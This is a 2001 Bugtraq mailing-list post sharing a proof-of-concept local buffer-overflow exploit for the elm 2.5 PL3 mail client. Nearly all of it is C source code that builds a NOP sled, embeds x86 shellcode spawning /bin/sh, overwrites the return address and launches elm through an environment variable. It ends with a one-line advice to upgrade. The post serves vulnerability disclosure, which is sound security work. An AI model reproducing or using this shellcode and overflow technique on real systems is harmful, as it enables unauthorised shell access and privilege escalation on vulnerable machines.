Date:         Tue, 13 Feb 2001 13:36:02 +0100
From: kiss <NIKEBOY@RETEMAIL.ES>
Subject:      elm 2.5 PL3 exploit
To: BUGTRAQ@SECURITYFOCUS.COM

this is a just a proof of concept, i haven't included setgid call in the
shellcode:

/***
    -------------
    elm253-exploit.c
    -------------
***/

#include <stdlib.h>

#define NOP 0x90
#define LEN 356
#define OFFSET 0
#define RET 0xbffffa64

unsigned long dame_sp() {
	__asm__("movl %esp,%eax");
}

void main() {

  	static char shellcode[]=
/* "\x31\xc0"	*/		/* xorl %eax,%eax	 */
/* "\x31\xdb"	*/		/* xorl %ebx,%ebx	 */
/* "\xb0\x17"	*/		/* movb $0x17,%al	 */
/* "\xcd\x80"	*/     		/* int $0x80     	 */
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

	int i=0;
	int cont=0;
	char buffer[LEN+4];
	char kid[6+LEN+4];

	printf("-------------------------------------\n");
	printf("elm buffer overflow exploit by _kiss_\n");
	printf("-------------------------------------\n");

	for (i=0;i<=LEN;i+=4)
		*(long *) &buffer[i] = RET;

	for (i=0;i<LEN-strlen(shellcode)-100;i++)
		buffer[i]=NOP;

	for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
		buffer[i]=shellcode[cont++];

	strcpy(kid,"KID=");
	strcat(kid,buffer);
	putenv(kid);
	system("/usr/local/bin/elm -f $KID");
}


solution is simple: upgrade ;)

							_kiss_